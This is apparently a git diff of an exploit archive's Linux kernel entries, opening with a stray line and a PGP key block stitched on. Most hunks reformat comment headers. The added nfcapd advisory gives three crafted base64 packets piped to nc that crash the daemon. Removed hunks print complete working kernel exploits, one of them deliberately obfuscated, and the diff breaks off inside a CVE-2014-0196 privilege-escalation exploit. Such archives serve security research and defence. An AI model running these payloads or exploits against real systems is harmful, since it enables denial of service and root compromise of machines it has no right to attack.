+technological cities, also known as Iost (Internet of Security Things ).
+
+
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
+xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
+xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
+55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
+U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
+SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
+d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
+AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
+Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
+f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
+pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
+LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
+95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
+AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
+ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
+gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
+tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
+6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
+TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
+DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
+MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
+Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
+FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
+I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
+C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
+=IZYl
+-----END PGP PUBLIC KEY BLOCK-----
--- a/platforms/linux/dos/15344.c
+++ b/platforms/linux/dos/15344.c
@ -1,4 +1,4 @@
-//source: http://www.securityfocus.com/bid/44242/info
+// source: http://www.securityfocus.com/bid/44242/info
 /*
 * CVE-2010-2963
 * Arbitrary write memory write via v4l1 compat ioctl.
--- a/platforms/linux/dos/15619.c
+++ b/platforms/linux/dos/15619.c
@ -1,4 +1,4 @@
-//source: http://www.securityfocus.com/bid/44301/info
+// source: http://www.securityfocus.com/bid/44301/info
 /* known for over a year, fixed in grsec
   bug is due to a bad limit on the max size of the stack for 32bit apps
   on a 64bit OS.   Instead of them being limited to 1/4th of a 32bit 
--- a/platforms/linux/dos/39800.txt
+++ b/platforms/linux/dos/39800.txt
@ -0,0 +1,97 @@
+(    , )     (,
+  .   '.' ) ('.    ',
+   ). , ('.   ( ) (
+  (_,) .'), ) _ _,
+ /  _____/  / _  \    ____  ____   _____
+ \____  \==/ /_\  \ _/ ___\/  _ \ /     \
+ /       \/   |    \\  \__(  <_> )  Y Y  \
+/______  /\___|__  / \___  >____/|__|_|  /
+        \/         \/.-.    \/         \/:wq
+                    (x.0)
+                  '=.|w|.='
+                  _=''"''=.
+
+                presents..
+Nfdump Nfcapd Multiple Vulnerabilities
+Affected Versions: Nfdump <= 1.6.14
+
+PDF: http://www.security-assessment.com/files/documents/advisory/Nfdump%20nfcapd%201.6.14%20-%20Multiple%20Vulnerabilities.pdf
+
+-------------+
+| Description |
+-------------+
+This document details multiple vulnerabilities found within the nfcapd netflow collector daemon. An unauthenticated
+attacker may leverage these vulnerabilities to trigger a denial of service condition within the nfcapd daemon. Two 
+read based heap overflow vulnerabilities were found within the IPFIX processing code and one logic based denial of 
+service was found in the Netflow V9 processing code.
+
+--------------+
+| Exploitation |
+--------------+
+== Process_ipfix_template_add heap overflow ==
+By tampering the flowset_length parameter within an IPFIX packet, an attacker can trigger a denial of service condition 
+within nfcapd. Line 931 in file ipfix.c decrements the size_left value by 4, and by triggering a condition where the 
+initial value is less than 4, eg. 1 as in the below POC, an integer underflow occurs. This wraps the size_left value 
+(indicating the remaining packet payload to be processed) to 4294967293, resulting in nfcapd continuously processing the
+heap-based buffer allocated for the input packet (allocated at line 381 of nfcapd.c) until it eventually hits invalid 
+memory and crashes with a segmentation fault. 
+
+--[ Process_ipfix_template_add heap overflow POC
+echo "AAoABQAAAAAAAAAAAAAAAAACAAUAAAABAA==" | base64 -d | nc -u 127.0.0.1 <port>
+
+== Process_ipfix_option_templates heap overflow ==
+By submitting an IPFIX packet with a flowset id of 3 and a large scope_field_count parameter (65535 in the below POC), 
+nfcapd will continuously process the heap-based buffer allocated for the packet, eventually hitting an invalid memory 
+address and crashing with a segmentation fault. The scope_field_count is taken directly from the packet (line 1108, 
+ipfix.c) and is subsequently used in the for loop processing the packet contents (line 1138, ipfix.c)
+
+--[ Process_ipfix_option_templates heap overflow POC
+echo "AAoAAQAAAAAAAAAAAAAAAAADAAoA/wAA//8AAAAAAAA=" | base64 -d | nc -u 127.0.0.1 <port>
+
+== Process_v9_data infinite loop ==
+By sending a crafted packet, an attacker can cause the nfcapd daemon to enter an infinite loop. As well as consuming a 
+considerable amount of processing power, this infinite loop will eventually exhaust all available disk space. Once disk
+space is exhausted, the nfcapd daemon will exit. 
+
+The infinite loop is triggered due to the table->input_record_size variable being set to zero. As the Process_v9_data 
+method processes the packet, table->input_record_size is subtracted from the size_left variable, with the intention being 
+that once size_left is zero the processing is concluded. As size_left is being decremented by zero each loop, this while 
+loop (line 1529, netflow_v9.c) runs infinitely.
+
+--[ Process_v9_data infinite loop POC 
+echo "AAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAUBAAAAAAAAAAAAAAAAAAAAAQAAAYA/w==" | base64 -d | nc -u 127.0.0.1 <port>
+
+Further information is available in the PDF version of this advisory. 
+
+----------+
+| Solution |
+----------+
+Upgrade to the latest Nfdump codebase (commit 6ef51a7405797289278b36a9a7deabb3cb64d80c or later)
+
+----------+
+| Timeline |
+----------+
+
+12/03/2016 - Advisory sent to Peter Haag
+19/03/2016 - Advisory acknowledged
+07/05/2016 - Additional information requested
+07/05/2016 - Updated version released on GitHub
+10/05/2016 - Advisory release
+
+-------------------------------+
+| About Security-Assessment.com |
+-------------------------------+
+
+Security-Assessment.com is a leading team of Information Security
+consultants specialising in providing high quality Information Security 
+services to clients throughout the Asia Pacific region. Our clients include
+some of the largest globally recognised companies in areas such as finance,
+telecommunications, broadcasting, legal and government. Our aim is to provide
+the very best independent advice and a high level of technical expertise while
+creating long and lasting professional relationships with our clients.
+
+Security-Assessment.com is committed to security research and development,
+and its team continues to identify and responsibly publish vulnerabilities
+in public and private software vendor's products. Members of the 
+Security-Assessment.com R&D team are globally recognised through their release
+of whitepapers and presentations related to new security research.
--- a/platforms/linux/local/18411.c
+++ b/platforms/linux/local/18411.c
@ -1,5 +1,7 @@
-/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
+/*
+Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
 Blog post about it is here: http://blog.zx2c4.com/749
+EDB-Note: Updated version can be found here: https://www.exploit-db.com/exploits/35161/

 # Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
 # Date: Jan 21, 2012
@ -222,4 +224,4 @@ int main(int argc, char **argv)
 		printf("[+] Executing child from child fork.\n");
 		execl("/proc/self/exe", argv[0], "-c", pid, NULL);
 	}
-}
+}
--- a/platforms/linux/local/19308.c
+++ b/platforms/linux/local/19308.c
@ -1,31 +0,0 @@
-source: http://www.securityfocus.com/bid/388/info
-
-The i_count member in the Linux inode structure is an unsigned short integer. It can be overflowed by mapping a single file too many times, allowing for a local user to possibly gain root access on the target machine or cause a denial of service.
-
-Below is a short example of how this vulnerability can be exploited:
-
-#include <unistd.h> 
-#include <fcntl.h>
-
-#include <sys/mman.h>
-
-void main()
-
-{
-
-int fd, i;
-
-fd = open("/lib/libc.so.5", O_RDONLY);
-
-for(i = 0; i < 65540; i++)
-
-{
-
-mmap((char*)0x50000000 + (0x1000 * i), 0x1000,
-
-PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
-
-}
-
-}
-
--- a/platforms/linux/local/19419.c
+++ b/platforms/linux/local/19419.c
@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/523/info

 This vulnerability has to do with the division of the address space between a user process and the kernel. Because of a bug, if you select a non-standard memory configuration, sometimes user level processes may be given access upto 252Mb of memory that are really part of the kernel. This allows the process to first search for its memory descriptor and then extend it to cover the rest of the kernel memory. It can then search for a task_struct and modify it so its uid is zero (root). This vulnerability is very obscure, only works on that version of linux, and only if you select a non-standard memory configuration.
@ -6,6 +7,8 @@ This vulnerability has to do with the division of the address space between a us
 The exploit (local root, can be extended to also reset securelevel;
 will only compile with libc 5, you'd have to rip task_struct out of
 <linux/sched.h> for compiling with glibc):
+*/
+

 #define __KERNEL__
 #include <linux/sched.h>
--- a/platforms/linux/local/19675.c
+++ b/platforms/linux/local/19675.c
@ -1,50 +0,0 @@
-/*
-source: http://www.securityfocus.com/bid/870/info
-
-Debian 2.1,Linux kernel 2.0.34/2.0.35/2.0.36/2.0.37/2.0.38,RedHat 5.2 i386 Packet Length with Options Vulnerability
-
-A vulnerability in the Linux kernel's TCP/IP allows local users to crash, hang or corrupt the system.
-
-A local user can crash, hang or currupt the system by sending out a packet with options longer than the maximum IP packet length. An easy way to generate such packet is by using the command "ping -s 65468 -R ANYADDRESS". The -R option is for the IP record route option. Under kernel versions 2.2.X the command will fail with an message of "message too long".
-
-The vulnerability seems to be the result of the kernel not checking aif packet with options is longer than the maximum packet size. A long packet seems to lead to memory corruption. 
-*/
-
-
-/* Exploit option length missing checks in Linux-2.0.38
-   Andrea Arcangeli <andrea@suse.de> */
-
-#include <sys/socket.h>
-#include <netinet/in.h>
-#include <netinet/udp.h>
-#include <netinet/ip.h>
-
-main()
-{
-	int sk;
-	struct sockaddr_in sin;
-	struct hostent * hostent;
-#define PAYLOAD_SIZE (0xffff-sizeof(struct udphdr)-sizeof(struct iphdr))
-#define OPT_SIZE 1
-	char payload[PAYLOAD_SIZE];
-
-	sk = socket(AF_INET, SOCK_DGRAM, 0);
-	if (sk < 0)
-		perror("socket"), exit(1);
-
-	if (setsockopt(sk, SOL_IP, IP_OPTIONS, payload, OPT_SIZE) < 0)
-		perror("setsockopt"), exit(1);
-
-	bzero((char *)&sin, sizeof(sin));
-
-	sin.sin_port = htons(0);
-	sin.sin_family = AF_INET;
-	sin.sin_addr.s_addr = htonl(2130706433);
-
-	if (connect(sk, (struct sockaddr *) &sin, sizeof(sin)) < 0)
-		perror("connect"), exit(1);
-
-	if (write(sk, payload, PAYLOAD_SIZE) < 0)
-		perror("write"), exit(1);
-}
-
--- a/platforms/linux/local/20001.sh
+++ b/platforms/linux/local/20001.sh
@ -1,6 +1,6 @@
-source: http://www.securityfocus.com/bid/1322/info
- 
-POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner. 
+#source: http://www.securityfocus.com/bid/1322/info
+# 
+# POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an additional form of privilege control to enable more specific control over what priviliged processes can do. Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a privileged process can perform. By setting specific bits, the actions of priviliged processes can be controlled -- access can be granted for various functions only to the specific parts of a program that require them. It is a security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid program that attempts to drop priviliges before executing code that could be dangerous if run as root, such as what sendmail does. When sendmail attempts to drop priviliges using setuid(getuid()), it fails not having the capabilities required to do so in its bitfields. It continues executing with superuser priviliges, and can run a users .forward file as root leading to a complete compromise. Procmail can also be exploited in this manner. 

 #!/bin/sh

--- a/platforms/linux/local/20626.c
+++ b/platforms/linux/local/20626.c
@ -1,3 +1,4 @@
+/* 
 source: http://www.securityfocus.com/bid/2364/info

 The Linux Kernel is the core of the Linux Operating System. It was originally written by Linus Torvalds, and is publicly maintained.
@ -5,6 +6,7 @@ The Linux Kernel is the core of the Linux Operating System. It was originally wr
 A problem in the Linux kernel may allow root compromise. The sysctl() call allows a privileged program to read or write kernel parameters. It is possible for underprivileged programs to use this system call to query values within the kernel. The system call accepts signed values, which could allow supplied negative values to reach below the threshold memory address set for system security.

 This makes it possible for a user with malicious motives to browse kernel space addresses, and potentially gain elevated privileges, including administrative access.
+*/

 /* sysctl_exp.c - Chris Evans - February 9, 2001 */

--- a/platforms/linux/local/20720.c
+++ b/platforms/linux/local/20720.c
@ -1,3 +1,6 @@
+/*
+EDB Note: Updated exploit can be found here: https://www.exploit-db.com/exploits/20721/
+
 source: http://www.securityfocus.com/bid/2529/info

 The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers.
@ -5,6 +8,7 @@ The Linux kernel is the core of all distributions of the Linux Operating System.
 A problem in the Linux Kernel could make it possible for a local user to gain elevated privileges. A problem with the checking of process tracing on programs attempting to execute other programs that are setuid or setgid. It is possible to trace a process after it has entered a setuid or setgid execution state.

 This makes it possible for a local user to change parts of the process as they function, and potentially gain elevated privileges. 
+*/

 /*
 * epcs v2
--- a/platforms/linux/local/20721.c
+++ b/platforms/linux/local/20721.c
@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/2529/info
 
 The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers.
@ -5,6 +6,7 @@ The Linux kernel is the core of all distributions of the Linux Operating System.
 A problem in the Linux Kernel could make it possible for a local user to gain elevated privileges. A problem with the checking of process tracing on programs attempting to execute other programs that are setuid or setgid. It is possible to trace a process after it has entered a setuid or setgid execution state.
 
 This makes it possible for a local user to change parts of the process as they function, and potentially gain elevated privileges. 
+*/

 /*
 * epcs2 (improved by lst [liquid@dqc.org])
--- a/platforms/linux/local/20979.c
+++ b/platforms/linux/local/20979.c
@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/2937/info

 The Linux /proc filesystem is a virtual filesystem provided by the Linux Kernel as an interface to some process and system information and parameters.
@ -5,6 +6,7 @@ The Linux /proc filesystem is a virtual filesystem provided by the Linux Kernel
 Under certain circumstances, an access validation error may exist in the handling of process-specific 'mem' files. The problem occurs when a process re-opens the standard input stream for reading from it's associated 'mem' file prior to executing another program using the exec() family of functions.

 This could have serious ramifications in some situations if an attacker were to reposition the read offset of the file to an arbitrary location prior to executing a setuid program that obtains data from stdin. 
+*/

 /**********************************************
 ** vuln-prog.c - chown root:root, chmod u+s **
--- a/platforms/linux/local/20988.c
+++ b/platforms/linux/local/20988.c
@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/2958/info

 CylantSecure is a commercial Linux hardening tool and security infrastructure available from Cylant Technology.
@ -5,6 +6,7 @@ CylantSecure is a commercial Linux hardening tool and security infrastructure av
 A problem in the CylantSecure infrastructure could allow users to escape monitoring. A user with root access may load a module that allows syscall redirection.

 This makes it possible for local users to execute system calls outside of the infrastructure, which could lead to the execution of malicious local programs.
+*/

 /*
 Juergen Pabel
--- a/platforms/linux/local/21353.c
+++ b/platforms/linux/local/21353.c
@ -1,9 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/4367/info

-
 The Linux kernel d_path() function converts a dentry structure into an ASCII path name. The full path to the specified dentry is returned in a fixed length buffer of size PAGE_SIZE bytes.

 Reportedly, if a dentry structure is passed with a path which would exceed this length, an erroneous value is returned. The path which is returned has leading entries truncated, and no error is reported.
+*/

 /*
 * 2.2.x/2.4.x Linux kernel d_path proof-of-concept exploit
--- a/platforms/linux/local/22458.c
+++ b/platforms/linux/local/22458.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/7279/info

 A weakness has been discovered on various systems that may result in an attacker gaining information pertaining to the existence of inaccessible files. The problem lies in the return times when attempting to access existent and non-existent files.

 By making requests for various files, it may be possible for an attacker to deduce whether the file exists, by examining the amount of time it takes for an error to be returned. 
+*/

 #include <stdlib.h>
 #include <unistd.h>
--- a/platforms/linux/local/22840.c
+++ b/platforms/linux/local/22840.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/8042/info

 A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file.

 An attacker could potentially exploit this vulnerability to gain read access to a setuid binary that would otherwise be unreadable. Although unconfirmed, it may also be possible for an attacker to write code to a target executable, making it theoretically possible to execute arbitrary code with elevated privileges.
+*/

 /****************************************************************
 *								*
--- a/platforms/linux/local/24043.c
+++ b/platforms/linux/local/24043.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/10201/info

 A local integer handling vulnerability has been announced in the Linux kernel. It is reported that this vulnerability may be exploited by an unprivileged local user to obtain kernel memory contents. Additionally it is reported that a root user may exploit this issue to write to arbitrary regions of kernel memory, which may be a vulnerability in non-standard security enhanced systems where uid 0 does not have this privilege.

 The vulnerability presents itself due to integer handling errors in the proc handler for cpufreq.
+*/

 /*
 *
--- a/platforms/linux/local/25202.c
+++ b/platforms/linux/local/25202.c
@ -1,8 +1,12 @@
+/*
+EDB Note: Updated exploit can be found here; https://www.exploit-db.com/exploits/25203/
+
 source: http://www.securityfocus.com/bid/12763/info

 A Local integer overflow vulnerability affects the Linux kernel. This issue is due to a failure of the affected kernel to properly handle user-supplied size values.

 An attacker may leverage this issue to overwrite low kernel memory. This may potentially facilitate privilege escalation. 
+*/

 /*
 * k-rad.c - linux 2.6.11 and below CPL 0 kernel exploit v2
@ -311,4 +315,4 @@ printf(KRAD "Overwriting %d pages\n", npages<0?-npages:npages);

 exploit(eater, npages<0?-npages:npages,npages<0);
 return 0;
-}
+}
--- a/platforms/linux/local/25203.c
+++ b/platforms/linux/local/25203.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/12763/info
 
 A Local integer overflow vulnerability affects the Linux kernel. This issue is due to a failure of the affected kernel to properly handle user-supplied size values.
 
 An attacker may leverage this issue to overwrite low kernel memory. This may potentially facilitate privilege escalation. 
+*/

 /*
 * k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3
--- a/platforms/linux/local/25234.sh
+++ b/platforms/linux/local/25234.sh
@ -1,10 +1,11 @@
-source: http://www.securityfocus.com/bid/12837/info
-
-The Linux kernel is reported prone to multiple vulnerabilities that occur because of "range-checking flaws" present in the ISO9660 handling routines.
-
-An attacker may exploit these issues to trigger kernel-based memory corruption. Ultimately, the attacker may be able to execute arbitrary malicious code with ring-zero privileges.
-
-These vulnerabilities are reported to be present in the ISO9660 filesystem handler including Rock Ridge and Juliet extensions for the Linux kernel up to and including version 2.6.11.
+# source: http://www.securityfocus.com/bid/12837/info
+#
+# The Linux kernel is reported prone to multiple vulnerabilities that occur because of "range-checking flaws" present in the ISO9660 handling routines.
+#
+# An attacker may exploit these issues to trigger kernel-based memory corruption. Ultimately, the attacker may be able to execute arbitrary malicious code with ring-zero privileges.
+#
+# These vulnerabilities are reported to be present in the ISO9660 filesystem handler including Rock Ridge and Juliet extensions for the Linux kernel up to and including version 2.6.11.
+#


 #!/bin/bash
--- a/platforms/linux/local/25287.c
+++ b/platforms/linux/local/25287.c
@ -1,8 +1,12 @@
+/*
+EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/
+
 source: http://www.securityfocus.com/bid/12911/info

 A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.

 A local attacker may leverage this issue to gain escalated privileges on an affected computer. 
+*/

 #include <sys/socket.h>
 #include <bluetooth/bluetooth.h>
--- a/platforms/linux/local/25288.c
+++ b/platforms/linux/local/25288.c
@ -1,8 +1,12 @@
+/*
+EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/
+
 source: http://www.securityfocus.com/bid/12911/info
 
 A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.
 
 A local attacker may leverage this issue to gain escalated privileges on an affected computer. 
+*/

 /*
  ONG_BAK v0.3   [april 8th 05]
--- a/platforms/linux/local/25289.c
+++ b/platforms/linux/local/25289.c
@ -1,8 +1,12 @@
+/*
+EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/
+
 source: http://www.securityfocus.com/bid/12911/info
  
 A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.
  
 A local attacker may leverage this issue to gain escalated privileges on an affected computer. 
+*/

 /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
 *
--- a/platforms/linux/local/25290.c
+++ b/platforms/linux/local/25290.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/12911/info
   
 A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.
   
 A local attacker may leverage this issue to gain escalated privileges on an affected computer. 
+*/

 /*

--- a/platforms/linux/local/25647.sh
+++ b/platforms/linux/local/25647.sh
@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/13589/info

 The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call.
@ -7,6 +8,7 @@ To exploit this vulnerability, a malicious user creates a malicious ELF executab
 Local users may exploit this vulnerability to execute arbitrary machine code in the context of the kernel, facilitating privilege escalation.

 **Update: This vulnerability does not exist in the 2.6 kernel tree. 
+*/

 #!/bin/bash
 #
--- a/platforms/linux/local/27461.c
+++ b/platforms/linux/local/27461.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/17203/info

 The Linux kernel is affected by local memory-disclosure vulnerabilities. These issues are due to the kernel's failure to properly clear previously used kernel memory before returning it to local users.

 These issues allow an attacker to read kernel memory and potentially gather information to use in further attacks.
+*/

 #include <stdio.h>
 #include <stdlib.h>
--- a/platforms/linux/local/29781.c
+++ b/platforms/linux/local/29781.c
@ -1,56 +0,0 @@
-source: http://www.securityfocus.com/bid/23142/info
-
-The Linux kernel is prone to a NULL-pointer dereference vulnerability.
-
-A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. The attacker may also be able to execute arbitrary code with elevated privileges, but this has not been confirmed.
-
-__ ip2.c __
-// advanced exploit code for catastrophic kernel bug by Joey Mengele, professional hacker
-// user, to dump 0xaddress from kernel memory: ./ip2 0xaddress
-#include <sys/signal.h>
-typedef int fg8;
-#include <sys/mman.h>
-typedef long _l36;
-#include <string.h>
-typedef long * jayn9124;
-#include <stdio.h>
-typedef char * anal;
-#include <netinet/in.h>
-#define __exit main
-#define __main exit
-typedef void pleb;
-#include <stdlib.h>
-fg8 ___hh(fg8,_l36,jayn9124);
-#include <unistd.h>
-pleb _zzy();
-#       define __f4 setsockopt
-#       define __f5 getsockopt
-fg8 __exit(fg8 argc, anal *argv[]) {
-_l36 tmp;
-fg8 s;
-_l36 hud;
-if (argc!=2) __main(-1);
-if (1 != sscanf(argv[1]," 0x%x",&hud)) __main(-1);
-signal(SIGSEGV,&exit);
-s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
-_zzy();
-__f4(s, IPPROTO_IPV6, 6, (void *)NULL, 0);
-___hh(s,hud,&tmp);
-printf("Kernel memory @ %.8x contains %.8x\n",hud,tmp);
-return 0;
-}
-int ___hh(int bf,_l36 _rtg,jayn9124 rape)
-{
-fg8 ot=4;
-*(jayn9124)(0x8) = _rtg;
-return __f5(bf,IPPROTO_IPV6,59,(void *)rape,&ot);
-}
-void _zzy()
-{
-_l36 *gol = NULL;
-if( (gol = mmap( (void *)NULL, 4096,
-PROT_READ|PROT_WRITE, MAP_FIXED |MAP_ANONYMOUS | MAP_PRIVATE, 0, 0
-)) == (void *) -1 )
-{perror( "mmap" );exit(412);}
-}
-__ ip2.c EOF __
--- a/platforms/linux/local/32815.c
+++ b/platforms/linux/local/32815.c
@ -1,41 +0,0 @@
-source: http://www.securityfocus.com/bid/33906/info
-
-The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.
-
-This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process.
-
-A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.
-
-Linux kernel 2.6.28 is vulnerable; other versions may also be affected. 
-
-#include <sched.h>
-#include <signal.h>
-#include <stdlib.h>
-#include <unistd.h>
-
-static int the_child(void* arg) {
-  sleep(1);
-  _exit(2);
-}
-
-int main(int argc, const char* argv[]) {
-  int ret = fork();
-  if (ret < 0)
-  {
-    perror("fork");
-    _exit(1);
-  }
-  else if (ret > 0)
-  {
-    for (;;);
-  }
-  setgid(99);
-  setuid(65534);
-  {
-    int status;
-    char* stack = malloc(4096);
-    int flags = SIGKILL | CLONE_PARENT;
-    int child = clone(the_child, stack + 4096, flags, NULL);
-  }
-  _exit(100);
-}
--- a/platforms/linux/local/32829.c
+++ b/platforms/linux/local/32829.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/33948/info

 The Linux kernel is prone to a local security-bypass vulnerability.

 A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges. 
+*/

 	/* test case for seccomp circumvention on x86-64
 	   There are two failure modes: compile with -m64 or compile with -m32.
--- a/platforms/linux/local/33228.txt
+++ b/platforms/linux/local/33228.txt
@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/36423/info
-
-The Linux kernel is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
-
-Local attackers may be able to exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts may crash the affected kernel, denying service to legitimate users.
-
-The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33228.tgz
--- a/platforms/linux/local/33321.c
+++ b/platforms/linux/local/33321.c
@ -1,8 +1,12 @@
+/*
+EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/33322/
+
 source: http://www.securityfocus.com/bid/36901/info

 Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.

 Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
+*/

 /******************************************************************************
 *                            .:: Impel Down ::.
--- a/platforms/linux/local/33516.c
+++ b/platforms/linux/local/33516.c
@ -0,0 +1,220 @@
+/*
+ * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
+ * condition
+ *
+ * Slightly-less-than-POC privilege escalation exploit
+ * For kernels >= v3.14-rc1
+ *
+ * Matthew Daley <mattd@bugfuzz.com>
+ *
+ * Usage: 
+ *   $ gcc cve-2014-0196-md.c -lutil -lpthread
+ *   $ ./a.out
+ *   [+] Resolving symbols
+ *   [+] Resolved commit_creds: 0xffffffff81056694
+ *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
+ *   [+] Doing once-off allocations
+ *   [+] Attempting to overflow into a tty_struct...............
+ *   [+] Got it :)
+ *   # id
+ *   uid=0(root) gid=0(root) groups=0(root)
+ *
+ * WARNING: The overflow placement is still less-than-ideal; there is a 1/4
+ * chance that the overflow will go off the end of a slab. This does not
+ * necessarily lead to an immediate kernel crash, but you should be prepared
+ * for the worst (i.e. kernel oopsing in a bad state). In theory this would be
+ * avoidable by reading /proc/slabinfo on systems where it is still available
+ * to unprivileged users.
+ *
+ * Caveat: The vulnerability should be exploitable all the way from
